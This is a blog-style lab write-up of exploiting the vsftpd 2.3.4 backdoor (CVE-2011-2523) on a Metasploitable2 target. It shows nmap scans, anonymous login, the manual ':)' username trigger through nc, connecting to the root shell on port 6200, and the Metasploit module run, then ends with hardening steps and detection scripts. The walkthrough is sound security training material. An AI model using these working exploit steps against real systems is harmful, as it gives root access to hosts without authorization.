FTP Vulnerability Exploitation

使徒行者vs   ·   Posted on 2020-05-30 21:12:53   ·   Field Notes


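I. Environment

Target IP: VM ip.149   OS: Metasploitable2-Linux   FTP version: vsftpd 2.3.4

Attacker IP: VM ip.151   OS: Kali-linux-2019

ip: stands for the addresses of one shared network segment, which are hidden here. For this lab it is enough that both machines are on the same segment.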

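II. Introduction to the FTP Protocol

The File Transfer Protocol (FTP) is a standard protocol for transferring files over a network, built on a client/server model. It belongs to the application layer of the network protocol stack. FTP uses port 21.

User categories:

  • Real users
  • Administrator
  • Anonymous users

FTP file transfer formats:

  • ASCII
  • Binary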
III. Anonymous Login

1. Confirm the target's IP address

    root@kali:~# nmap ip.1/24
    ...
    Nmap scan report for ip.149
    Host is up (0.00050s latency).
    Not shown: 977 closed ports
    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    23/tcp open telnet
    25/tcp open smtp
    53/tcp open domain
    80/tcp open http
    111/tcp open rpcbind
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    512/tcp open exec
    513/tcp open login
    514/tcp open shell
    1099/tcp open rmiregistry
    1524/tcp open ingreslock
    2049/tcp open nfs
    2121/tcp open ccproxy-ftp
    3306/tcp open mysql
    5432/tcp open postgresql
    5900/tcp open vnc
    6000/tcp open X11
    6667/tcp open irc
    8009/tcp open ajp13
    8180/tcp open unknown
    MAC Address: 00:0C:29:83:F3:95 (VMware)
    ...

Note: only part of the scan output is shown. It confirms that the target's IP is ip.149.

2. Confirm the FTP version

    root@kali:~# nmap -A ip.149
    ...
    PORT STATE SERVICE VERSION
    21/tcp open ftp vsftpd 2.3.4
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst:
    | STAT:
    | FTP server status:
    | Connected to ip.151
    | Logged in as ftp
    | TYPE: ASCII
    | No session bandwidth limit
    | Session timeout in seconds is 300
    | Control connection is plain text
    | Data connections will be plain text
    | vsFTPd 2.3.4 - secure, fast, stable
    |_End of status
    ...

Note:
-A: full scan; detects the OS version, version information, and so on

3. Log in as the anonymous user

    root@kali:~# nc ip.149 21
    220 (vsFTPd 2.3.4)
    USER anonymous
    331 Please specify the password.
    PASS 123
    230 Login successful.
    HELP
    214-The following commands are recognized.
    ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
    MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
    RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
    XPWD XRMD
    214 Help OK.

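USER/PASS: enter the username (anonymous) and any password.
With the anonymous username and an arbitrary password, the login to the target succeeds.
Enter HELP to list the commands the server recognizes.

IV. Exploiting the FTP Backdoor Vulnerability

1. Scan for the FTP backdoor vulnerability with nmap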

    root@kali:~# nmap --script=vuln -p 21 ip.149
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 15:15 CST
    Nmap scan report for 192.168.72.149
    Host is up (0.00036s latency).
    PORT STATE SERVICE
    21/tcp open ftp
    |_clamav-exec: ERROR: Script execution failed (use -d to debug)
    | ftp-vsftpd-backdoor:
    | VULNERABLE:
    | vsFTPd version 2.3.4 backdoor
    | State: VULNERABLE (Exploitable)
    | IDs: CVE:CVE-2011-2523 BID:48539
    | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
    | Disclosure date: 2011-07-03
    | Exploit results:
    | Shell command: id
    | Results: uid=0(root) gid=0(root)
    | References:
    | https://www.securityfocus.com/bid/48539
    | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
    | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    |_sslv2-drown:
    MAC Address: 00:0C:29:83:F3:95 (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

CVE: Common Vulnerabilities and Exposures

2. Trigger the vsftpd-2.3.4 backdoor with nc

    root@kali:~# nc ip.149 21
    220 (vsFTPd 2.3.4)
    USER user:)
    331 Please specify the password.
    PASS pass

Open a second terminal to use the backdoor:

    root@kali:~# nc ip.149 6200
    id
    uid=0(root) gid=0(root)

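nc is now connected to a bash shell on the target, and Linux commands can be entered.
Syntax: nc <target IP address> <port>
Triggering the vsftpd backdoor by hand: during FTP authentication, if the USER name contains :), a shell listening for connections on port 6200 is triggered directly.
Port 6200 is not open by default, as the scan output from the step that confirmed the target IP shows.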
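
From the defender's side, the two observable effects described above (a USER argument containing :) and a new listener on port 6200) can be checked for as follows. This is an added example, not part of the original post; it assumes vsftpd protocol logging (log_ftp_protocol) writes lines in the format of the constructed sample, and that socket state comes from `ss -ltn`.

```sh
#!/bin/sh
# Added example, not from the original post. All sample data is constructed.

# Print each client IP that sent a USER command whose argument contains ":)".
# Input: vsftpd protocol-log lines on stdin (line format is an assumption).
smiley_user_clients() {
    awk -F'"' '
        toupper(substr($4, 1, 5)) == "USER " && index($4, ":)") { print $2 }
    ' | sort -u
}

# Exit 0 if `ss -ltn`-style output on stdin shows a TCP listener on port 6200.
backdoor_port_listening() {
    awk '$1 == "LISTEN" && $4 ~ /:6200$/ { hit = 1 } END { exit (hit ? 0 : 1) }'
}

# Constructed log sample: one normal anonymous login, one backdoor trigger.
SAMPLE_LOG='Thu May 21 15:20:01 2020 [pid 2] FTP command: Client "192.0.2.151", "USER anonymous"
Thu May 21 15:20:03 2020 [pid 2] FTP command: Client "192.0.2.151", "PASS <password>"
Thu May 21 15:21:10 2020 [pid 2] FTP command: Client "192.0.2.77", "USER user:)"
Thu May 21 15:21:12 2020 [pid 2] FTP command: Client "192.0.2.77", "PASS <password>"'

# Constructed `ss -ltn` sample taken after the trigger.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      32     0.0.0.0:21         0.0.0.0:*
LISTEN 0      100    0.0.0.0:6200       0.0.0.0:*'

printf 'clients sending ":)" in USER:\n%s\n' \
    "$(printf '%s\n' "$SAMPLE_LOG" | smiley_user_clients)"
if printf '%s\n' "$SAMPLE_SS" | backdoor_port_listening; then
    echo "ALERT: listener on tcp/6200"
fi
```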

V. Metasploit in Practice: FTP Vulnerability Exploitation

1. Start postgresql

    root@kali:~# systemctl start postgresql
    root@kali:~# systemctl status postgresql
    postgresql.service - PostgreSQL RDBMS
    Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor p>
    Active: active (exited) since Thu 2020-05-21 15:22:14 CST; 15s ago
    Process: 6362 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
    Main PID: 6362 (code=exited, status=0/SUCCESS)
    May 21 15:22:14 kali systemd[1]: Starting PostgreSQL RDBMS...
    May 21 15:22:14 kali systemd[1]: Finished PostgreSQL RDBMS.

systemctl start postgresql: starts the postgresql database

systemctl status postgresql: checks the status of the postgresql database

2. Penetration testing with Metasploit

2.1 Open the msfconsole console

    root@kali:~# msfconsole

2.2 Connect to a database

    msf5 > db_connect msf:123456@127.0.0.1/msf

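This connects to Metasploit's default msf database. You can also create your own database and connect to that instead. The database stores the results of probing.

2.3 Probe the target's FTP service with nmap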

    msf5 > db_nmap -sV -p 21 ip.149
    [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 20:18 CST
    [*] Nmap: Nmap scan report for 192.168.72.149
    [*] Nmap: Host is up (0.00032s latency).
    [*] Nmap: PORT STATE SERVICE VERSION
    [*] Nmap: 21/tcp open ftp vsftpd 2.3.4
    [*] Nmap: MAC Address: 00:0C:29:83:F3:95 (VMware)
    [*] Nmap: Service Info: OS: Unix
    [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

2.4 View the probe records in the database

    msf5 > services
    Services
    ========
    host port proto name state info
    ---- ---- ----- ---- ----- ----
    ip.149 21 tcp ftp open vsftpd 2.3.4

2.5 Search for the exploit code

    msf5 > search vsftpd 2.3.4
    Matching Modules
    ================
    # Name Disclosure Date Rank Check Description
    - ---- --------------- ---- ----- -----------
    0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
    1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
    2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
    3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

2.6 Set the payload-related configuration

    msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT 21 yes The target port (TCP)
    Exploit target:
    Id Name
    -- ----
    0 Automatic

2.7 Set the target IP address and check that the setting took effect

    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS ip.149
    RHOSTS => ip.149
    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOSTS ip.149 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT 21 yes The target port (TCP)
    Exploit target:
    Id Name
    -- ----
    0 Automatic

2.8 Run exploit to obtain a Bash shell

    msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    [*] ip.149:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] ip.149:21 - USER: 331 Please specify the password.
    [+] ip.149:21 - Backdoor service has been spawned, handling...
    [+] ip.149:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> ip.149:6200) at 2020-05-21 15:53:08 +0800
    whoami
    root

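To verify that the session is a Bash shell on the target, enter the whoami command: the logged-in user is root. Other commands can be entered as well.

VI. FTP Hardening

1. Edit the system FTP configuration file (/etc/vsftpd/vsftpd.conf) to disable anonymous login.
2. Patch the specific vulnerability, or configure the firewall to block connections to the backdoor port.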

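    # Drop inbound TCP connections to the backdoor port
    iptables -A INPUT -p tcp --dport 6200 -j DROP
    # Drop outbound TCP traffic originating from the backdoor port
    iptables -A OUTPUT -p tcp --sport 6200 -j DROP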
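
Both hardening steps can be verified after the fact. The script below is an added example, not part of the original post: it reports the effective anonymous_enable value of a vsftpd.conf file and checks `iptables -S` output for the DROP rule on port 6200. The function names and sample inputs are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post. Sample inputs are constructed.

# Print the effective anonymous_enable value (YES or NO) of a vsftpd.conf file.
# vsftpd's built-in default is YES, so a missing or commented-out line still
# allows anonymous login; when the option repeats, the last assignment is used.
effective_anonymous_enable() {
    awk -F= '
        BEGIN { val = "YES" }                  # compiled-in default
        /^[[:space:]]*#/ { next }              # skip comment lines
        $1 == "anonymous_enable" {             # no spaces around "=" in vsftpd.conf
            v = toupper($2); gsub(/[[:space:]]/, "", v)
            if (v == "YES" || v == "TRUE" || v == "1") val = "YES"
            else if (v == "NO" || v == "FALSE" || v == "0") val = "NO"
        }
        END { print val }
    ' "$1"
}

# Exit 0 if `iptables -S`-style rules on stdin contain an INPUT rule that
# drops TCP traffic to destination port 6200.
has_backdoor_drop_rule() {
    grep -Eq '^-A INPUT .*-p tcp .*--dport 6200 .*-j DROP$'
}

# Constructed demonstration: a config where the option is only commented out,
# then the same config with an explicit NO appended.
conf="$(mktemp)"
printf '%s\n' '# anonymous_enable=NO' 'local_enable=YES' > "$conf"
echo "option commented out -> anonymous_enable=$(effective_anonymous_enable "$conf")"
printf '%s\n' 'anonymous_enable=NO' >> "$conf"
echo "explicit NO appended -> anonymous_enable=$(effective_anonymous_enable "$conf")"
rm -f "$conf"

# Constructed `iptables -S` sample containing the rule from the step above.
if printf '%s\n' '-P INPUT ACCEPT' '-A INPUT -p tcp -m tcp --dport 6200 -j DROP' \
        | has_backdoor_drop_rule; then
    echo "DROP rule for tcp/6200 present"
fi
```

A matching DROP rule only takes effect if no earlier ACCEPT rule in the same chain matches the traffic first.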

© 2016 - 2023 掌控者 All Rights Reserved.